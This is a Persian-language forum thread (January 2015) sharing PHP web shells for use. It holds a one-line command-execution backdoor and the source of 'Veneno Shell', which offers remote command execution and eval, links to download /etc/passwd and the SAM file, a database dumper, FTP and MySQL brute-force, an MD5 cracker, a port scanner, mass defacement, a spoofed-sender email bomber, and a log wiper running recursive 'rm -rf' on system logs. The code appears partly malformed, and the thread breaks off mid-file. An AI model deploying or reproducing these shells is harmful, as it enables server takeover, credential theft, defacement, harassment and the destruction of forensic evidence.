PHP Shell

RoOot · ژانویه 3 2015

سلام دوستان

تمام شل کد های که به زبان php نوشته میشه در این تاپیک

در آخر آموزش شل کد نویسی هم میزاریم

تشکر از مدیریت محترم تیم امنیتی گارد ایران

توجه: اگر به مشکل برخوردید اسپم نکنید پیام خصوصی دهید.

RoOot · ژانویه 3 2015

Simple PHP Backdoor Shell

<?php

if(isset($_REQUEST[‘cmd’])){

echo "<pre>";

$cmd = ($_REQUEST[‘cmd’]);

system($cmd);

echo "</pre>";

die;

}

?>

RoOot · ژانویه 12 2015

Veneno Shell - Poison Shell

<?php

error_reporting(0);

/*

Veneno Shell 1.0

Mail : venenoderon[at]hotmail[com]

Web : venen0.eu

*/

@session_start();

$username = "md5password"; //pw

$password = "md5password"; //pw

if (isset($_POST['user'])) {

if (md5($_POST['user']) == $username && md5($_POST['pass']) == $password) {

$_SESSION['loginh'] = "1";

}

if (isset($_GET['chaunow'])) {

@session_destroy();

}

if ($_SESSION['loginh'] == 1) {

if (isset($_GET['info'])) {

die(phpinfo());

}

if (isset($_POST['sessionew'])) {

@session_start();

if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {

echo "<script>alert('Sesion aceptada');</script>";

} else {

echo "<script>alert('Error');</script>";

}

function creditos() {

echo "<br><br></fieldset><br><br>"; // ventana termina

echo "<fieldset><center>-- == (C) DoddyHackMan 2012 || Contact editor: venenoderon[at]hotmail[com] || Web: venen0.eu == --</center></fieldset>";

exit(1);

}

if(isset($_GET['bajardb'])) {

$tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);

mysql_select_db($_GET['bajardb']);

$resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']);

while ($tabla = mysql_fetch_row($resultado)) {

foreach($tabla as $indice => $valor) {

$todo.= "<br><br>".$valor."<br><br>";

$resultadox = mysql_query("SELECT * FROM ".$valor);

$todo.="<table border=1>";

for ($i=0;$i< mysql_num_fields($resultadox);$i++) {

$todo.="<th>".mysql_field_name($resultadox,$i)."</th>";

}

while($dat = mysql_fetch_row($resultadox)) {

$todo.="<tr>";

foreach($dat as $val) {

$todo.="<td >".$val."</td>";

}

$todo.="</tr></table>";

}

@mysql_free_result($tod);

@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");

@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");

echo $todo;

exit(1);

}

if(isset($_GET['bajartabla'])) {

$tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");

mysql_select_db($_GET['condb']);

if(!empty($_GET['sentencia'])) {

$resultado = mysql_query($_GET['sentencia']);

} else {

$resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']);

}

$todo.="<table border=1>";

for ($i=0;$i< mysql_num_fields($resultado);$i++) {

$todo.="<th>".mysql_field_name($resultado,$i)."</th>";

}

while($dat = mysql_fetch_row($resultado)) {

$todo.="<tr>";

foreach($dat as $val) {

$todo.="<td>".$val."</td>";

}

@mysql_free_result($tod);

$todo.="</tr></table>";

@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");

@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");

echo $todo;

exit(1);

}

if (isset($_GET['reload'])) {

$tipo = pathinfo($_GET['reload']);

echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'">';

creditos();

}

function dame($file) {

return substr(sprintf('%o', fileperms($file)), -4);

}

if (isset($_GET['down'])) {

header("Content-Type: application/octet-stream");

header("Content-Disposition: attachment; filename=".basename($_GET['down']));

readfile($_GET['down']);

exit(0);

}

if (isset($_POST['cookienew'])) {

if (setcookie($_POST['cookienew'],$_POST['valor'])) {

echo "<script>alert('Cookie creada');</script>";

echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">';

} else {

echo "<script>alert('Error');</script>";

}

echo '<style type="text/css">

.main {

margin : -287px 0px 0px -490px;

border : White solid 1px;

BORDER-COLOR: #FF0000;

}

#pie {

position: absolute;

bottom: 0;

}

body,a:link {

background-color: #000000;

color:#00FF00;

Courier New;

cursor:crosshair;

font-size: small;

}

input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {

font: normal 10px Verdana, Arial, Helvetica,

sans-serif;

background-color:black;color:#FF0000;

border: solid 1px #FF0000;

border-color:#FF0000

}

a:link,a:visited,a:active {

color: #FF0000;

font: normal 10px Verdana, Arial, Helvetica,

sans-serif;

text-decoration: none;

}

</style>';

echo "<title>".$_SERVER["SERVER_NAME"]." - VenenoShell</title>";

$verdad = php_uname('s').php_uname('r');

$link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$verdad."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";

echo "<center><table><tr><td class=main><br><h2> VenenoShell </h2><br></td><td class=main>

<b>Sistema</b> : <a href='".$link."'>".$verdad."</a> "." ".php_uname('v')."<br><b>Servidor</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>";

if (file_exists("C:/WINDOWS/repair/sam")) {

echo "<b>Archivo encontrado: </b><a href=?down=C:/WINDOWS/repair/sam>SAM</a> ";

}

if (file_exists("/etc/passwd")) {

echo "<b>Archivo encontrado: </b><a href=?down=/etc/passwd>etc/passwd</a> ";

}

echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']."

<b>Usuario</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()."

<b>Path</b> : ".getcwd()."

<b>Version PHP</b> : ".phpversion()."<br>";

if (ini_get('safe_mode')==0) {

echo "<b>Modo seguro</b> : OFF ";

} else {

echo "<b>Modo seguro</b> : ON ";

}

if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {

echo "<b>Magic Quotes</b> : ON ";

} else {

echo "<b>Magic Quotes</b> : OFF ";

}

exec("perl -h",$perl);

if ($perl) {

echo "<b>Perl</b> : ON ";

} else {

echo "<b>Perl</b> : OFF ";

}

exec("wget --help",$wget);

if ($wget) {

echo "<b>WGET</b> : ON ";

} else {

echo "<b>WGET</b> : OFF ";

}

exec("curl_version",$curl);

if ($curl) {

echo "<b>CURL</b> : ON ";

} else {

echo "<b>CURL</b> : OFF ";

}

echo "</tr></td></table></center><br>";

echo "

<table>

<td class=main><a href=?dir=>Navegar</a></td><td class=main><a href=?cmd=>CMD</a></td>

<td class=main><a href=?upload=>Subir</a></td><td class=main><a href=?base64=>Base64</a></td>

<td class=main><a href=?phpconsole=>Evaluar</a></td><td class=main><a href=?info=>infoPHP</a></td>

<td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?cracker=>Crackers</a></td>

<td class=main><a href=?proxy=>ProxyWeb</a></td>

<td class=main><a href=?port=>Puerto escaner</a></td><td class=main><a href=?md5=>Codificadores</a></td>

<td class=main><a href=?md5crack=>MD5 Cracker</a></td>

<td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td>

<td class=main><a href=?logs=>LimpiaLogs</a></td><td class=main><a href=?ftp=>FTP</a></td>

<td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td>

<td class=main><a href=?sessionmanager=>Sesion</a></td>

<td class=main><a href=?chau=>Destruir</a></td>

</table>

</center>

";

echo "<fieldset><br>"; //ventana inicia

//and count($_POST) == 0

if (count($_GET) == 0) {

echo <<<_HTML_

¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾

¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾

¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾

¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾

¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾¾

¾ ¾¾¾¾¾¾¾¾¾¾ ¾

¾ ¾ ¾¾¾¾ ¾ ¾

¾ ¾¾ ¾¾

¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾

¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾

¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾ ¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾

¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾

¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾

¾¾¾¾¾¾ ¾¾¾¾¾¾

¾¾¾¾ ¾¾¾¾

</pre></center>

_HTML_;

}

if (isset($_GET['cracker'])) {

echo "

<h2><center>Multi Cracker</center></h2><br>

<td><b>Wordlist: </b></td><td><input type=text name=passnow value='c:/aca.txt'></td><tr>

<td><b>Servicio: </b></td><td><select name=services><option>FTP</option><option>MYSQL</option></select></td><tr>

</table><br><br><input type=submit value=Crack><br><br></center>

</form>

";

if (isset($_POST['passnow'])) {

$open = fopen($_POST['passnow'],"r");

echo "<br><br><fieldset><center>";

echo "<br>[+] Crackeando<br><br>";

if ($_POST['services'] == "FTP") {

echo "[+] Servicio : FTP<br><br>";

while(!feof($open)) {

$word = fgets($open,255);

$linea = chop($word);

if ($enter = ftp_connect($_POST['host'])) {

if ($dentro = ftp_login($enter,$_POST['user'],$linea)) {

echo "[+] Usuario: ".$_POST['user']."<br>";

echo "[+] Clave: ".$linea."<br>";

fclose($open);

ftp_close($enter);

echo "<br><br>[+] Escaner finalizado<br><br>";

creditos();

}

echo "<br><br>[+] Escaner finalizado<br><br>";

}

if ($_POST['services'] == "MYSQL") {

echo "[+] Servicio: MYSQL<br><br>";

while(!feof($open)) {

$word = fgets($open,255);

$linea = chop($word);

if (mysql_connect($_POST['host'],$_POST['user'],$linea)) {

echo "[+] Usuario: ".$_POST['user']."<br>";

echo "[+] Clave: ".$linea."<br>";

fclose($open);

mysql_close();

echo "<br><br>[+] Escaner finalizado<br><br>";

creditos();

}

echo "<br><br>[+] Escaner finalizado<br><br>";

}

if (!empty($_GET['hostar'])) {

@set_time_limit(5);

echo "<center><h2>Escaner de puertos</h2></center><br><br>";

echo "<fieldset>";

echo "[+] <b>Victima: </b>".$_GET['hostar']."<br>";

echo "[+] <b>Escanear hasta: </b>".$_GET['start']."-".$_GET['end']."<br><br>";

for ( $i = $_GET['start'] ; $i < $_GET['end'] ; $i++ ) {

$re = @fsockopen($_GET['hostar'],$i,$errno,$errstr,1);

if ($re) {

echo "<b>[+] Puertos encontrados: </b>".$i."<br>";

}

echo "<br><br><b>[+] Escaner finalizado</b><br><br>";

echo "</fieldset>";

}

if (isset($_GET['port'])) {

echo "<center><h2>Escaner de puertos</h2></center><br><br>";

echo "<center>

<td><b>Port Start : </b></td><td><input type=text name=start value=79></td><tr>

</table><br>

</form></center>

<br>";

}

if (isset($_GET['proxy'])) {

echo "<center><h2>Simple ProxyWeb</h2></center><br><br>";

echo "<center><form action='' method=GET>";

echo "<b>Web : </b><input type=text size=40 name=proxy value=http://localhost/sql.php><input type=submit value=Get>";

echo "</form></center>";

$code = @file_get_contents($_GET['proxy']);

if ($code) {

echo "<br><br><fieldset>".$code."<br><br></fieldset>";

}

if (isset($_GET['md5'])) {

echo "<form action='' method=POST>

</form>

";

}

if (isset($_POST['tex'])) {

echo "<br><br>Result<br><br><fieldset>";

if ($_POST['optionsa'] == "MD5") {

echo md5($_POST['tex']);

}

if ($_POST['optionsa'] == "SHA1") {

echo sha1($_POST['tex']);

}

if ($_POST['optionsa'] == "CRC32") {

printf("%u\n",crc32($_POST['tex']));

}

echo "</fieldset>";

}

if(isset($_GET['perms'])) {

echo "

<br>

Perms : <input type=text name=perms value=".dame($_GET['perms'])."

</form>

";

}

if (isset($_POST['cambiarperms'])) {

if (chmod($_POST['archivo'],$_POST['perms'])) {

echo "<script>alert('cHANGED');</script>";

} else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font>

";

}

if (isset($_GET['ren'])) {

echo "

File : <input type=text name=nombre value=".$_GET['ren']."><br>

Change to : <input type=text name=cambio><br><BR>

</form>

";

}

if (isset($_POST['cambios'])) {

if (@rename($_POST['nombre'],$_POST['cambio'])) {

echo "<script>alert('Cambiado');</script>";

} else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>";

}

if (isset($_POST['crear1'])) {

chdir($_POST['dir']);

if (fopen($_POST['crear1'],"w")) {

echo "<script>alert('Archivo creado');</script>";

}else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";

}

if (isset($_POST['crear2'])) {

chdir($_POST['dir']);

if (@mkdir($_POST['crear2'],777)) {

echo "<script>alert('Directorio creado');</script>";

} else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";

}

if (isset($_GET ['copiar'])) {

echo '

File : <input type=text name=archivo value='.$_GET['copiar'].'><br>

Copy to : <input type=text name=nuevo><br><br>

</form>

';

}

if (isset($_POST['copiado'])) {

if (copy($_POST['archivo'],$_POST['nuevo'])) {

echo "<script>alert('OK');</script>";

} else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";

}

if (isset($_GET['open'])) {

echo "<form action='' method=POST>";

echo "<center>";

echo "<textarea cols=80 rows=40 name=code>";

$archivo = file($_GET['open']);

foreach($archivo as $n=>$sub) {

$texto = htmlspecialchars($sub);

echo $texto;

}

echo "</textarea></center>";

echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>";

echo "</form>";

}

if (isset($_POST['modificar'])) {

$modi = fopen($_GET['open'],'w+');

if ($yeah = fwrite($modi,$_POST['code'])) {

echo "<script>alert('OK');</script>";

} else {

echo "<script>alert('Error');</script>";

}

echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>";

}

if (isset($_POST['options'])) {

$files = $_POST['valor'];

if ($_POST['options'] == "Delete") {

foreach ($files as $file) {

if (filetype($file) == "dir") {

//@rmdir($file);

} else {

//@unlink($file);

}

echo '<meta http-equiv=Refresh content="0;url=?dir='.$dir->path.'">';

echo "<script>alert('Archivos eliminados');</script>";

}

if ($_POST['options'] == "Download") {

foreach ($files as $file) {

echo '<meta http-equiv=Refresh content="0;url=?down='.$file.'">';

exit(0);

}

if ($_POST['options'] == "Copy") {

echo "<form action='' method=POST>";

foreach($files as $file) {

echo 'Name : <input type=text name=rutax[] value="'.$file.'"> a: <input type=text name=cambiax[] value="'.$file.'"><br>';

}

echo "<br><br><input type=submit value=Copy>";

echo "</form>";

exit(0);

}

if ($_POST['options'] == "Move") {

echo "<form action='' method=POST>";

foreach($files as $file) {

echo 'Name : <input type=text name=rutas[] value="'.$file.'"> a: <input type=text name=cambiar[] value="'.$file.'"><br>';

}

echo "<br><br><input type=submit name=mirameboludo value=Move>";

echo "</form>";

creditos();

}

if (isset($_POST['rutax'])) {

$tengo = count($_POST['rutax']);

for ($i = 0; $i <= $tengo; $i++) {

@copy($_POST['rutax'][$i],$_POST['cambiax'][$i]);

}

echo "<script>alert('Archivos copiados');</script>";

}

if (isset($_POST['mirameboludo'])) {

$tengo = count($_POST['rutas']);

for ($i = 0; $i <= $tengo; $i++) {

@rename($_POST['rutas'][$i],$_POST['cambiar'][$i]);

}

echo "<script>alert('Archivos movidos');</script>";

}

if (isset($_GET['dir'])) {

if ($_GET['dir']=="") {

$path = getcwd();

@chdir($path);

$dir = @dir($path);

} else {

$path = $_GET['dir'];

@chdir($path);

$dir = @dir($path);

}

$scans = range("B","Z");

echo "<b>Eliminar drives: </b>";

foreach($scans as $drive) {

$drive = $drive.":\\";

if (is_dir($drive)) {

echo " "."<a href=?dir=".$drive.">".$drive."</a>";

}

echo "

<b>Directorio</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar>

</form>

<b>Nuevo archivo</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>

</form>

<b>Nuevo Directorio</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>

</form><br><br>

";

$archivos = array('dir'=>array(),'file'=>array());

while ($archivo = $dir->read()) {

$ver = @filetype($path.'/'.$archivo) ;

if ($ver=="dir") {

$archivos['dir'][] = $path.'/'.$archivo;

} else {

$archivos['file'][] = $path.'/'.$archivo;

}

$dir->rewind();

if (count($archivos['dir'])==0 and count($archivos['file']==0)) {

echo "<script>alert('Directorio borrado');/<script>";

}

echo "<form action='' method=POST>";

echo "<br><b>Directorio encontrado</b> : ".count($archivos['dir'])."<br>";

echo "<b>Archivos encontrados</b> : ".count($archivos['file'])."<br><br><br>";

echo "<table bgcolor=#00FF00 border=1>";

echo "<td width=100>Nombre</td><td width=100>Type</td><td width=100>Tiempo modificado</td>";

echo "<td width=100>Permisos</td><td width=100>Accion</td>";

echo "<tr>";

foreach ($archivos['dir'] as $dirs) {

$dirsx = pathinfo($dirs);

echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>";

echo "<td width=100>Directory</td>";

echo "<td width=100>".date("F d Y H:i:s",fileatime($dirs))."</td>";

echo "<td width=100><a href=?perms=".$dirs.">".dame($dirs)."</a></td>";

echo "<td><input type=checkbox name=valor[] value=".$dirs."></td>";

echo "</tr><tr>";

}

foreach ($archivos['file'] as $files) {

$filex = pathinfo($files);

echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>";

echo "<td width=100>File</td>";

echo "<td width=100>".date("F d Y H:i:s",fileatime($files))."</td>";

echo "<td width=100><a href=?perms=".$files.">".dame($files)."</a></td>";

echo "<td><input type=checkbox name=valor[] value=".$files."></td>";

echo "</tr><tr>";

}

echo "</table>";

echo"<br><br>

Opciones :

<option>Eliminar</option>

<option>Mover</option>

<option>Copiar</option>

<option>Descargar</option>

</select> <input type=submit value=Ok></form>";

}

if (isset($_GET['cmd'])) {

echo '<center><h2>Consola</h2><br>

<b>Comando: </b><input type=text name=comando size=50><input type=submit name=ejecutar value=Now>

</form></center>

';

}

if (isset($_POST['ejecutar'])) {

echo '<center><br>

<br><br>Comando<br><br>

'.$_POST['comando'].'</fieldset>

<br><br>Resultado<br><br><fieldset>';

if (!system($_POST['comando'])) {

echo "<script>alert('Error al ejecutar');</script>";

echo "Error";

}

echo "</center><br><br></fieldset><br><br>";

}

if (isset($_GET['upload'])) {

echo "<center><h2>Subir archivos</h2></center><center><br><br><br>";

echo '

<b>Archivo: </b><input type=file name=archivo><br><br>

<b>Directorio: </b><input type=text name=destino value='.getcwd().'>

</form>';

if (isset($_FILES['archivo'])) {

$subimos = basename($_FILES['archivo']['name']);

if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) {

if (copy($subimos,$_POST['destino']."/".$subimos)) {

unlink($subimos);

echo "<script>alert('Archivo subido');</script>";

}

} else {

echo "<script>alert('Error');</script>";

}}}

if (isset($_GET['base64'])) {

echo '<center><h2>Des/Codificador base64</h2><br>

<b>Codificar:</b> <input type=text name=code size=50><input type=submit name=codificar value=Encode>

</form>

<b>Descodificar:</b> <input type=text name=decode size=50><input type=submit name=decodificar value=Decode>

</form></center>

';

}

if (isset($_POST['codificar'])) {

echo "<center>";

echo "<br><br>Texto<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Resultado<br><br><fieldset>";

echo base64_encode($_POST['code']) ;

echo "</fieldset></center><br><br>";

}

if (isset($_POST['decodificar'])) {

echo "<center><br><br>Texto<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Resultado<br><br><fieldset>";

echo base64_decode($_POST['decode']);

echo "</fieldset></center><br><br>";

}

if (isset($_GET['phpconsole'])) {

echo '<center><h2>Funcion eval()</h2><center><br>

<b>Codigo:</b> <input type=text name=codigo size="70"><input type=submit name=cargar value=OK>

</form>

';

}

if (isset($_POST['cargar'])) {

echo "<br><br>Codigo<br><br>

".$_POST['codigo']."

</fieldset>

Resultado<br><br>

<fieldset>";

eval($_POST['codigo']);

echo "</fieldset>

";

}

if (isset($_GET['logs'])) {

echo '

<br><br><center><h3>Pateador</h3>

</form></center>

';

}

if (isset($_GET['clean'])) {

$paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",

"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",

"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",

"/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",

"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

echo "<br><br><center><h2>OutPut</h2></center>";

$comandos = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST');

echo "<center>";

foreach($paths as $path) {

if(@unlink($path)) {

echo $path.": <b>Eliminado</b><br>";

}

echo "<br><br>";

foreach($comandos as $comando) {

echo "<b>Ejecutar comando: </b>".$comando."<br>";

system($comando);

}

echo "<center>";

}

if(isset($_GET['mass'])) {

echo "<center><h2>MassDefacement</h2></center><br><br><center>

<b>Directorio principal:</b> <input type=text name=dir value=".getcwd()."><br><br>

<b>Codigo:</b> <input type=text name=codigo size=70>

</form>

</center>

";

}

function juntar ($dira,$text) {

$dir= opendir($dira);

while (!is_bool($archivos = readdir($dir))) {

if ($archivos != "..") {

if ($archivos != ".") {

if ($archivos != basename($_SERVER['PHP_SELF'])) {

if (@filetype($dira."/".$archivos) == dir) {

juntar($dira."/".$archivos,$text);

} else {

echo "<center>";

echo "<b>Deface: </b>".$dira."/".$archivos."<br>";

$solo = fopen($dira."\\".$archivos,"w");

$solo = fwrite($solo,$text);

fclose($solo);

echo "</center>";

}}}}}}

if (isset($_POST['def'])) {

echo "<br><br><center><h2>OutPut</h2></center><br><br>";

juntar($_POST['dir'],$_POST['codigo']);

}

if (isset($_GET['chau'])) {

if ($_GET['chau'] == "fuckit") {

echo "<br><br><h3>BooooooM!!!</h3><br><br>";

//unlink(basename($_SERVER['PHP_SELF'])); //descomentar para usar esta funcion

} else {

echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>";

}

if (isset($_GET['bomber'])) {

echo "<center><h2>Email bombeador</h2></center><br><br>

<td>CorreoVictima: </td><td><input type=text name=idiot value=victima@hotmail.com size=44><tr>

<td>Correo falso: </td><td><input type=text name=falso value=veneno@usa.gov size=44><tr>

<td>Nombre falso: </td><td><input type=text name=nombrefalso value=Veneno size=44><tr>

<td>Lista de emails: </td><td><input type=text name=listamails value=Nada size=44><tr>

<td>Asunto: </td><td><input type=text name=asunto value=Correo falso size=44><tr>

<td>Cuenta: </td><td><input type=text name=count value=1 size=44><tr>

<td>Mensaje: </td><td><textarea name=mensaje rows=7 cols=40>Esto es un correo anonimo</textarea></td><tr>

</table><br><br>

</form>

";

}

if (isset($_POST['bombers'])) {

$need .="MIME-Version: 1.0\n";

$need .="Content-type: text/html ; charset=iso-8859-1\n";

$need .="MIME-Version: 1.0\n";

$need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n";

$need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n";

$need .="Reply-To:".$_POST['falso']."\n";

$need .="X-Priority: 1\n";

$need .="X-MSMail-Priority:Hight\n";

$need .="X-Mailer:Widgets.com Server";

echo "<br><br><br><center><h2>Resultado</h2><br><br>";

for ($i = 1; $i <= $_POST['count']; $i++) {

if ($_POST['listamails'] != "None") {

$open = fopen($_POST['listamails'],"r");

while(!feof($open)) {

$word = fgets($open,255);

$word = chop($word);

if(@mail($word,$_POST['asunto'],$_POST['mensaje'],$need)) {

echo "[+] Mensaje <b>$i</b> to <b>".$word."</b> enviado<br>";

flush();

} else {

echo "[+] Mensaje <b>$i</b> to <b>".$word."</b> No enviado<br>";

}}} else {

if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) {

echo "[+] Mensaje <b>$i</b> to <b>".$_POST['idiot']."</b> Enviado<br>";

flush();

} else {

echo "[+] Mensaje <b>$i</b> to <b>".$_POST['idiot']."</b> No enviado<br>";

}}}

echo "</center>";

}

if (isset($_GET['md5crack'])) {

echo "

<h2>MD5 Cracker</h2><br><br>

<td><b>Saltado: </b></td><td><input type=text name=salto size=50></td><tr>

<td><b>Lista de palabras: </b></td><td><input type=text name=listmd5 size=50 value='c:/ejemplo.txt'></td>

</table><br><br>

</form>

</center>

";

}

if (isset($_POST['md5'])) {

$open = fopen($_POST['listmd5'],"r");

echo "<br><br><fieldset><center>";

echo "<br>[+] Empezando a buscar<br><br>";

while(!feof($open)) {

$word = fgets($open,255);

$linea = chop($word);

if (!empty($_POST['salto'])) {

$test = md5($linea.$_POST['salto']);

} else {

$test = md5($linea);

}

if ($test == $_POST['md5']) {

echo "<br>[+] Hash crackeado: ".$_POST['md5'].":".$linea."<br><br>";

creditos();

} else {

echo "[+] : ".$_POST['md5']." != ".$linea."<br>";

}

echo "<br>[+] Finalizado<br>";

echo "</center></fieldset>";

}

if (isset($_GET['cookiemanager'])) {

echo "<h2>Cookies</h2><br><br>";

echo "[+] <b>Cookies encontradas</b> : ".count($_COOKIE)."<br><br>";

echo "

<b>Nueva cookie:</b> <input type=text name=cookienew><BR>

<b>Valuado:</b> <input type=text name=valor><BR><br>

</form><br>";

echo "<table>";

echo "<td class=main><b>Nombre</b></td><td class=main><b>Valor</b></td><tr>";

if (count($_COOKIE) != 0) {

foreach ($_COOKIE as $nombre=>$valor) {

echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";

}

echo "</table>";

}

echo "<br><br>";

}

if (isset($_GET['sessionmanager'])) {

@session_start();

echo "<h2>Sesion</h2><br><br>";

echo "[+] <b>Sesiones encontradas</b> : ".count($_SESSION)."<br><br>";

echo "

<b>Nueva sesion:</b> <input type=text name=sessionew><BR>

<b>Valor:</b> <input type=text name=valor><BR><br>

</form><br>";

if (count($_SESSION) != 0) {

echo "<table>";

echo "<td class=main><b>Nombre</b></td><td class=main><b>Valor</b></td><tr>";

foreach ($_SESSION as $nombre=>$valor) {

echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";

}

echo "</table>";

}

if (isset($_GET['ftp'])) {

echo "<center><h2>FTP Manager</h2><br>";

echo "

<td><b>Servidor: </b></td><td><input type=text name=serverftp value=127.0.0.1></td><tr>

<td><b>Usuario: </b></td><td><input type=text name=user value=Veneno></td><tr>

<td><b>Clave: </b></td><td><input type=text name=pass value=123></td><tr>

</table><br>

</center></form>

";

}

if (isset($_GET['serverftp'])) {

if ($enter = @ftp_connect("127.0.0.1")) {

if ($dentro = @ftp_login($enter,"Veneno","123")) {

echo "<br><b>[+] Conectado al servidor</b><br>";

} else {

echo "<br><b>[-] Error en el login</b><br><br>";

}

echo "<b>[+] En linea</b><br><br><br>";

echo "

Directory : <input type=text name=diar value=";

if (empty($_GET['diar'])) {

echo ftp_pwd($enter);

} else {

echo $_GET['diar'];

}

echo ">

</form>

Nuevo directorio: <input type=text name=newdirftp><input type=submit value=Load>

</form>

<br><br>";

if (isset($_GET['diar'])) {

$enter = @ftp_connect($_GET['serverftp']);

$dentro = @ftp_login($enter,$_GET['user'],$_GET['pass']);

if (empty($_GET['diar'])) {

